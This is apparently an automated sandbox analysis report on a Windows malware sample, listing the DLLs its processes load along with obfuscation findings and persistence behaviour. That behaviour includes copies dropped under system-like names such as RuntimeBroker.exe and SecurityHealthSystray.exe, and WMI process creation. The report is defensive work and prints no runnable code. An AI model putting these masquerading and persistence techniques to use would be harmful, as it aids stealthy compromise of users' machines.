                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                      Source: C:\Recovery\RuntimeBroker.exeSection loaded: mscoree.dll
                      Source: C:\Recovery\RuntimeBroker.exeSection loaded: kernel.appcore.dll
                      Source: C:\Recovery\RuntimeBroker.exeSection loaded: version.dll
                      Source: C:\Recovery\RuntimeBroker.exeSection loaded: vcruntime140_clr0400.dll
                      Source: C:\Recovery\RuntimeBroker.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Recovery\RuntimeBroker.exeSection loaded: uxtheme.dll
                      Source: C:\Recovery\RuntimeBroker.exeSection loaded: wldp.dll
                      Source: C:\Recovery\RuntimeBroker.exeSection loaded: amsi.dll
                      Source: C:\Recovery\RuntimeBroker.exeSection loaded: userenv.dll
                      Source: C:\Recovery\RuntimeBroker.exeSection loaded: profapi.dll
                      Source: C:\Recovery\RuntimeBroker.exeSection loaded: windows.storage.dll
                      Source: C:\Recovery\RuntimeBroker.exeSection loaded: cryptsp.dll
                      Source: C:\Recovery\RuntimeBroker.exeSection loaded: rsaenh.dll
                      Source: C:\Recovery\RuntimeBroker.exeSection loaded: cryptbase.dll
                      Source: C:\Recovery\RuntimeBroker.exeSection loaded: sspicli.dll
                      Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dll
                      Source: C:\Windows\System32\chcp.comSection loaded: ulib.dll
                      Source: C:\Windows\System32\chcp.comSection loaded: fsutilext.dll
                      Source: C:\Windows\System32\w32tm.exeSection loaded: iphlpapi.dll
                      Source: C:\Windows\System32\w32tm.exeSection loaded: logoncli.dll
                      Source: C:\Windows\System32\w32tm.exeSection loaded: netutils.dll
                      Source: C:\Windows\System32\w32tm.exeSection loaded: ntmarta.dll
                      Source: C:\Windows\System32\w32tm.exeSection loaded: ntdsapi.dll
                      Source: C:\Windows\System32\w32tm.exeSection loaded: mswsock.dll
                      Source: C:\Windows\System32\w32tm.exeSection loaded: dnsapi.dll
                      Source: C:\Windows\System32\w32tm.exeSection loaded: rasadhlp.dll
                      Source: C:\Windows\System32\w32tm.exeSection loaded: fwpuclnt.dll
                      Source: C:\Windows\System32\w32tm.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dll
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeSection loaded: mscoree.dll
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeSection loaded: kernel.appcore.dll
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeSection loaded: version.dll
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeSection loaded: vcruntime140_clr0400.dll
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeSection loaded: uxtheme.dll
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeSection loaded: wldp.dll
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeSection loaded: amsi.dll
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeSection loaded: userenv.dll
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeSection loaded: profapi.dll
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeSection loaded: windows.storage.dll
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeSection loaded: cryptsp.dll
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeSection loaded: rsaenh.dll
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeSection loaded: cryptbase.dll
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeSection loaded: sspicli.dll
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeSection loaded: ktmw32.dll
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeSection loaded: wbemcomn.dll
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeSection loaded: iphlpapi.dll
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeSection loaded: dnsapi.dll
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeSection loaded: dhcpcsvc6.dll
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeSection loaded: dhcpcsvc.dll
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeSection loaded: winnsi.dll
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeSection loaded: rasapi32.dll
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeSection loaded: rasman.dll
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeSection loaded: rtutils.dll
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeSection loaded: mswsock.dll
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeSection loaded: winhttp.dll
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeSection loaded: ondemandconnroutehelper.dll
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeSection loaded: winmm.dll
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeSection loaded: winmmbase.dll
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeSection loaded: mmdevapi.dll
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeSection loaded: devobj.dll
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeSection loaded: ksuser.dll
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeSection loaded: avrt.dll
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeSection loaded: audioses.dll
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeSection loaded: powrprof.dll
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeSection loaded: umpdc.dll
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeSection loaded: msacm32.dll
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeSection loaded: midimap.dll
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeSection loaded: dwrite.dll
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeSection loaded: edputil.dll
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeSection loaded: windowscodecs.dll
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeSection loaded: ntmarta.dll
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeSection loaded: dpapi.dll
                      Source: C:\Program Files\Windows Portable Devices\MaEiPrsQRasQLtRzJjb.exeSection loaded: mscoree.dll
                      Source: C:\Program Files\Windows Portable Devices\MaEiPrsQRasQLtRzJjb.exeSection loaded: kernel.appcore.dll
                      Source: C:\Program Files\Windows Portable Devices\MaEiPrsQRasQLtRzJjb.exeSection loaded: version.dll
                      Source: C:\Program Files\Windows Portable Devices\MaEiPrsQRasQLtRzJjb.exeSection loaded: vcruntime140_clr0400.dll
                      Source: C:\Program Files\Windows Portable Devices\MaEiPrsQRasQLtRzJjb.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Program Files\Windows Portable Devices\MaEiPrsQRasQLtRzJjb.exeSection loaded: uxtheme.dll
                      Source: C:\Program Files\Windows Portable Devices\MaEiPrsQRasQLtRzJjb.exeSection loaded: wldp.dll
                      Source: C:\Program Files\Windows Portable Devices\MaEiPrsQRasQLtRzJjb.exeSection loaded: amsi.dll
                      Source: C:\Program Files\Windows Portable Devices\MaEiPrsQRasQLtRzJjb.exeSection loaded: userenv.dll
                      Source: C:\Program Files\Windows Portable Devices\MaEiPrsQRasQLtRzJjb.exeSection loaded: profapi.dll
                      Source: C:\Program Files\Windows Portable Devices\MaEiPrsQRasQLtRzJjb.exeSection loaded: windows.storage.dll
                      Source: C:\Program Files\Windows Portable Devices\MaEiPrsQRasQLtRzJjb.exeSection loaded: cryptsp.dll
                      Source: C:\Program Files\Windows Portable Devices\MaEiPrsQRasQLtRzJjb.exeSection loaded: rsaenh.dll
                      Source: C:\Program Files\Windows Portable Devices\MaEiPrsQRasQLtRzJjb.exeSection loaded: cryptbase.dll
                      Source: C:\Program Files\Windows Portable Devices\MaEiPrsQRasQLtRzJjb.exeSection loaded: sspicli.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: qmgr.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: bitsperf.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: firewallapi.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: esent.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: fwbase.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: bitsigd.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: upnp.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: ssdpapi.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: wsmauto.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: miutils.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: wsmsvc.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: pcwum.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: mi.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: wkscli.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: webio.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: usermgrcli.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: execmodelclient.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: coremessaging.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: twinapi.appcore.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: resourcepolicyclient.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: vssapi.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: vsstrace.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: samcli.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: samlib.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: es.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: bitsproxy.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: mpr.dll
                      Source: C:\Users\user\Desktop\84JufgBTrA.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32
                      Source: Window RecorderWindow detected: More than 3 window changes detected
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
                      Source: C:\Users\user\Desktop\84JufgBTrA.exeDirectory created: C:\Program Files\Windows Portable Devices\MaEiPrsQRasQLtRzJjb.exe
                      Source: C:\Users\user\Desktop\84JufgBTrA.exeDirectory created: C:\Program Files\Windows Portable Devices\557bb37d3fa657
                      Source: 84JufgBTrA.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                      Source: 84JufgBTrA.exeStatic file information: File size 3511394 > 1048576
                      Source: 84JufgBTrA.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                      Source: Binary string: 7C:\Users\user\AppData\Local\Temp\b5tsyhrw\b5tsyhrw.pdb source: 84JufgBTrA.exe, 00000000.00000002.1801490254.0000000003C10000.00000004.00000800.00020000.00000000.sdmp

                      Data Obfuscation

                      Source: 84JufgBTrA.exe, _.cs.Net Code: Main System.Reflection.Assembly.Load(byte[])
                      Source: RuntimeBroker.exe.0.dr, _.cs.Net Code: Main System.Reflection.Assembly.Load(byte[])
                      Source: MaEiPrsQRasQLtRzJjb.exe.0.dr, _.cs.Net Code: Main System.Reflection.Assembly.Load(byte[])
                      Source: MaEiPrsQRasQLtRzJjb.exe0.0.dr, _.cs.Net Code: Main System.Reflection.Assembly.Load(byte[])
                      Source: MaEiPrsQRasQLtRzJjb.exe1.0.dr, _.cs.Net Code: Main System.Reflection.Assembly.Load(byte[])
                      Source: C:\Users\user\Desktop\84JufgBTrA.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\b5tsyhrw\b5tsyhrw.cmdline"
                      Source: C:\Users\user\Desktop\84JufgBTrA.exeCode function: 0_2_00007FFD9B875D1E pushfd ; ret 0_2_00007FFD9B875D2B
                      Source: C:\Users\user\Desktop\84JufgBTrA.exeCode function: 0_2_00007FFD9BA2EAD9 pushad ; iretd 0_2_00007FFD9BA2EAEA
                      Source: C:\Users\user\Desktop\84JufgBTrA.exeCode function: 0_2_00007FFD9BA2EA01 pushad ; iretd 0_2_00007FFD9BA2EA1A
                      Source: C:\Users\user\Desktop\84JufgBTrA.exeCode function: 0_2_00007FFD9BA2D7F1 push ebx; iretd 0_2_00007FFD9BA2D80A
                      Source: C:\Program Files\Windows Portable Devices\MaEiPrsQRasQLtRzJjb.exeCode function: 41_2_00007FFD9B8B5D1E pushfd ; ret 41_2_00007FFD9B8B5D2B
                      Source: C:\Program Files\Windows Portable Devices\MaEiPrsQRasQLtRzJjb.exeCode function: 41_2_00007FFD9B8D82E1 push eax; iretd 41_2_00007FFD9B8D82E2
                      Source: C:\Program Files\Windows Portable Devices\MaEiPrsQRasQLtRzJjb.exeCode function: 41_2_00007FFD9B8D82DA push eax; iretd 41_2_00007FFD9B8D82DB
                      Source: C:\Recovery\RuntimeBroker.exeCode function: 45_2_00007FFD9B8B5D1E pushfd ; ret 45_2_00007FFD9B8B5D2B
                      Source: C:\Program Files\Windows Portable Devices\MaEiPrsQRasQLtRzJjb.exeCode function: 46_2_00007FFD9B895D1E pushfd ; ret 46_2_00007FFD9B895D2B
                      Source: C:\Recovery\RuntimeBroker.exeCode function: 48_2_00007FFD9B895D1E pushfd ; ret 48_2_00007FFD9B895D2B
                      Source: C:\Recovery\RuntimeBroker.exeCode function: 48_2_00007FFD9B8B82E1 push eax; iretd 48_2_00007FFD9B8B82E2
                      Source: C:\Recovery\RuntimeBroker.exeCode function: 48_2_00007FFD9B8B82DA push eax; iretd 48_2_00007FFD9B8B82DB
                      Source: C:\Program Files\Windows Portable Devices\MaEiPrsQRasQLtRzJjb.exeCode function: 49_2_00007FFD9B8A5D1E pushfd ; ret 49_2_00007FFD9B8A5D2B
                      Source: C:\Recovery\RuntimeBroker.exeCode function: 50_2_00007FFD9B8B5D1E pushfd ; ret 50_2_00007FFD9B8B5D2B
                      Source: C:\Recovery\RuntimeBroker.exeCode function: 50_2_00007FFD9B8D82E1 push eax; iretd 50_2_00007FFD9B8D82E2
                      Source: C:\Recovery\RuntimeBroker.exeCode function: 50_2_00007FFD9B8D82DA push eax; iretd 50_2_00007FFD9B8D82DB
                      Source: C:\Windows\crx\scripts\extension\MaEiPrsQRasQLtRzJjb.exeCode function: 52_2_00007FFD9B8C82E1 push eax; iretd 52_2_00007FFD9B8C82E2
                      Source: C:\Windows\crx\scripts\extension\MaEiPrsQRasQLtRzJjb.exeCode function: 52_2_00007FFD9B8C82DA push eax; iretd 52_2_00007FFD9B8C82DB
                      Source: C:\Windows\crx\scripts\extension\MaEiPrsQRasQLtRzJjb.exeCode function: 52_2_00007FFD9B8A5D1E pushfd ; ret 52_2_00007FFD9B8A5D2B
                      Source: C:\Windows\crx\scripts\extension\MaEiPrsQRasQLtRzJjb.exeCode function: 52_2_00007FFD9B8B3CB7 push ss; ret 52_2_00007FFD9B8B3CCA
                      Source: C:\Recovery\RuntimeBroker.exeCode function: 53_2_00007FFD9B895D1E pushfd ; ret 53_2_00007FFD9B895D2B

                      Persistence and Installation Behavior

                      Source: C:\Users\user\Desktop\84JufgBTrA.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSystem file written: C:\Windows\System32\SecurityHealthSystray.exe
                      Source: C:\Users\user\Desktop\84JufgBTrA.exeFile created: C:\Users\user\Desktop\xlsyLrRW.log
                      Source: C:\Users\user\Desktop\84JufgBTrA.exeFile created: C:\Users\user\Desktop\DNOFZBcI.log
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeFile created: C:\Users\user\Desktop\qJFYyXNw.log
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeFile created: C:\Users\user\Desktop\jdYrkeMJ.log
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Windows\System32\SecurityHealthSystray.exe
                      Source: C:\Users\user\Desktop\84JufgBTrA.exeFile created: C:\Users\user\Desktop\YKVbAlIQ.log
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeFile created: C:\Users\user\Desktop\BxjPijIe.log
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeFile created: C:\Users\user\Desktop\XACLJBdm.log
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeFile created: C:\Users\user\Desktop\GbeNbtEV.log
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeFile created: C:\Users\user\Desktop\fmuTYeTZ.log
                      Source: C:\Users\user\Desktop\84JufgBTrA.exeFile created: C:\Users\user\Desktop\FGdoLyOG.log
                      Source: C:\Users\user\Desktop\84JufgBTrA.exeFile created: C:\Users\user\Desktop\iyARkwDy.log
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeFile created: C:\Users\user\Desktop\wtLyrQzn.log
                      Source: C:\Users\user\Desktop\84JufgBTrA.exeFile created: C:\Users\user\Desktop\FPAovlhD.log
                      Source: C:\Users\user\Desktop\84JufgBTrA.exeFile created: C:\Users\user\Desktop\RjzUmbxe.log
                      Source: C:\Users\user\Desktop\84JufgBTrA.exeFile created: C:\Users\user\Desktop\LyGNneTv.log
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeFile created: C:\Users\user\Desktop\BgcwUNOc.log
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeFile created: C:\Users\user\Desktop\lWnZWaxI.log
                      Source: C:\Users\user\Desktop\84JufgBTrA.exeFile created: C:\Program Files (x86)\WindowsPowerShell\Configuration\MaEiPrsQRasQLtRzJjb.exe
                      Source: C:\Users\user\Desktop\84JufgBTrA.exeFile created: C:\Recovery\RuntimeBroker.exe
                      Source: C:\Users\user\Desktop\84JufgBTrA.exeFile created: C:\Users\user\Desktop\rcIHUqTf.log
                      Source: C:\Users\user\Desktop\84JufgBTrA.exeFile created: C:\Users\user\Desktop\yZwGwFNU.log
                      Source: C:\Users\user\Desktop\84JufgBTrA.exeFile created: C:\Program Files\Windows Portable Devices\MaEiPrsQRasQLtRzJjb.exe
                      Source: C:\Users\user\Desktop\84JufgBTrA.exeFile created: C:\Users\user\Desktop\IIQWghSC.log
                      Source: C:\Users\user\Desktop\84JufgBTrA.exeFile created: C:\Users\user\Desktop\kvbZFwSt.log
                      Source: C:\Users\user\Desktop\84JufgBTrA.exeFile created: C:\Users\user\Desktop\ordqNcIm.log
                      Source: C:\Users\user\Desktop\84JufgBTrA.exeFile created: C:\Users\user\Desktop\LqWvJvsp.log
                      Source: C:\Users\user\Desktop\84JufgBTrA.exeFile created: C:\Users\user\Desktop\XbctOGCS.log
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeFile created: C:\Users\user\Desktop\eqGsIhxV.log
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeFile created: C:\Users\user\Desktop\zmagdNkm.logJump to dropped file
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeFile created: C:\Users\user\Desktop\MUHnEZJK.logJump to dropped file
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeFile created: C:\Users\user\Desktop\FoaFqfIX.logJump to dropped file
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeFile created: C:\Users\user\Desktop\SWHMRrhv.logJump to dropped file
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeFile created: C:\Users\user\Desktop\pMdQdXyB.logJump to dropped file
                      Source: C:\Users\user\Desktop\84JufgBTrA.exeFile created: C:\Users\user\Desktop\hKwJyjHA.logJump to dropped file
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeFile created: C:\Users\user\Desktop\WDaDoBOr.logJump to dropped file
                      Source: C:\Users\user\Desktop\84JufgBTrA.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeJump to dropped file
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeFile created: C:\Users\user\Desktop\kZMRAajN.logJump to dropped file
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeFile created: C:\Users\user\Desktop\LgDeSLNM.logJump to dropped file
                      Source: C:\Users\user\Desktop\84JufgBTrA.exeFile created: C:\Users\user\Desktop\crpSXvpM.logJump to dropped file
                      Source: C:\Users\user\Desktop\84JufgBTrA.exeFile created: C:\Users\user\Desktop\zXYOSFcP.logJump to dropped file
                      Source: C:\Users\user\Desktop\84JufgBTrA.exeFile created: C:\Users\user\Desktop\VZqLtXxX.logJump to dropped file
